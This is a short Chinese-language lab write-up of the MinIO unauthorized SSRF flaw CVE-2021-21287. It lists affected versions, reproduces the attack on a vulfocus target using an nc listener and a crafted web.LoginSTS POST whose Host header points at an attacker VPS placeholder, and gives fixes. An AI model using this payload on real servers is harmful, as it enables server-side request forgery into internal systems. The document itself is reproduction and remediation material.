Minio未授权SSRF漏洞（CVE-2021-21287）

漏洞描述

MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。客户端支持Java,Net,Python,Javacript, Golang语言。
由于MinIO组件中LoginSTS接口设计不当，导致存在服务器端请求伪造漏洞。
攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。

影响版本

MinIO<RELEASE.2021-01-30T00-20-58Z

漏洞复现

1、靶场环境使用vulfocus的在线环境。

 

 2、在vps上开启监听，nc -lvp 5555

3、使用bp抓取登录数据包，修改登录数据包

 

 payload数据包：

POST /minio/webrpc HTTP/1.1
Host: VPS_IP:5555
Content-Length: 79
x-amz-date: 20221213T025119Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://123.58.224.8:32602
Referer: http://123.58.224.8:32602/minio/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"id":1,"jsonrpc":"2.0","params":{"token":     "test"},"method":"web.LoginSTS"}

漏洞修复

1、配置环境变量“ MINIO_BROWSER = off”

2、目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://github.com/minio/minio/releases/tag/RELEASE.2021-01-30T00-20-58Z